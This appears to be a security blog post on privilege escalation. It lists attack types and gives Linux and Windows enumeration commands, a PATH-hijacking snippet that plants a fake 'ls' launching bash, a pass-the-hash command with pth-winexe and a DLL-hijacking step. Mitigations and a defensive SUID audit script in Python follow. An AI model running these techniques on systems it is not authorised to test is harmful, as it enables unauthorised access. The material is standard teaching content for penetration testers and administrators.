Privilege escalation is a cybersecurity attack in which an adversary exploits flaws or misconfigurations in a system to obtain higher access rights or permissions than originally granted, allowing actions that bypass intended security controls.
Here are different types of privilege escalation attacks:
- Vertical Privilege Escalation (Privilege Elevation): Gaining higher-level permissions (e.g., user to admin).
- Horizontal Privilege Escalation: Accessing another user's privileges at the same level (e.g., user A accessing user B's data).
- Kernel Exploits: Leveraging vulnerabilities in the OS kernel.
- Misconfigured File Permissions: Exploiting improperly set file/folder permissions.
- SUID/SGID Exploits: Abusing executables with elevated permissions.
- Scheduled Tasks/Cron Jobs: Manipulating automated tasks to execute malicious code.
- DLL Hijacking: Replacing legitimate DLLs with malicious ones.
- Password Attacks: Cracking or stealing credentials for higher privileges.
You Should Know:
Linux Privilege Escalation Commands & Techniques
1. Check User Privileges:
```bash
whoami
id
sudo -l
```
2. Find SUID/SGID Files:
```bash
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
```
3. Kernel Exploit Check:
```bash
uname -a
searchsploit "Linux Kernel <version>"
```
4. Cron Job Inspection:
```bash
crontab -l
ls -la /etc/cron*
```
5. Exploiting PATH Hijacking:
```bash
echo "/bin/bash" > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
```
Windows Privilege Escalation Techniques
1. Check User Permissions:
```cmd
whoami /priv
net user <username>
```
2. Find Unquoted Service Paths:
```cmd
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
```
3. DLL Hijacking:
- Use Procmon to identify missing DLLs.
- Replace with malicious DLL.
4. Registry Checks for Weak Permissions:
```cmd
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
```
5. Pass-the-Hash Attack:
```bash
pth-winexe -U <hash> //<target> cmd
```
Prevention & Mitigation
- Regular Patch Management:
```bash
sudo apt update && sudo apt upgrade -y   # Linux
```
- Least Privilege Principle: Restrict user permissions.
- Audit File Permissions:
  - auditd (Linux auditing tool)
  - icacls (Windows)
- Disable Unnecessary Services:
```bash
systemctl disable <service>
```
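The `find / -perm -4000` commands above list every SUID/SGID file, but an audit needs to know which of them are *unexpected*. The following Python script is an added example (not from the original post) that walks the filesystem the way `find` does and reports SUID/SGID binaries missing from a baseline allowlist, plus any SUID file that is also world-writable. The `BASELINE_SUID` set is an assumed Debian-style list, not taken from the page, and must be tailored to the host's package manifest.

```python
"""Audit SUID/SGID binaries against a baseline allowlist."""
import os
import stat

# Assumed baseline: SUID/SGID binaries normally present on a Debian-style host.
# Replace with the list derived from your own package manifest.
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/lib/openssh/ssh-keysign",
}

# Pseudo-filesystems that are noisy and never hold persistent binaries.
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")


def check_entry(path, mode, uid, baseline=BASELINE_SUID):
    """Return finding strings for one file, given its lstat() mode and owner."""
    findings = []
    if not stat.S_ISREG(mode):
        return findings  # symlinks, directories and devices are not executables
    if mode & stat.S_ISUID:
        if path not in baseline:
            findings.append(f"UNEXPECTED_SUID {path} (owner uid {uid})")
        if mode & stat.S_IWOTH:  # anyone could replace the privileged binary
            findings.append(f"WORLD_WRITABLE_SUID {path}")
    if mode & stat.S_ISGID and path not in baseline:
        findings.append(f"UNEXPECTED_SGID {path} (owner uid {uid})")
    return findings


def audit_suid(root="/", baseline=BASELINE_SUID):
    """Walk `root` like `find <root> -perm -4000 -type f` and collect findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entry; equivalent to find's 2>/dev/null
            findings.extend(check_entry(path, st.st_mode, st.st_uid, baseline))
    return findings


if __name__ == "__main__":
    for finding in audit_suid():
        print(finding)
```

Run it as root for full coverage and diff the output against a previous run; a new `UNEXPECTED_SUID` line is the signal worth an alert.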
What Undercode Says:
Privilege escalation remains a critical attack vector in cybersecurity. Understanding both offensive and defensive techniques is essential for penetration testers and system administrators. Regular audits, strict permission controls, and staying updated with exploits are key to mitigating risks.
Expected Output:
```
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo)
```
Reported By: Xmodulo Privilege – Hackers Feeds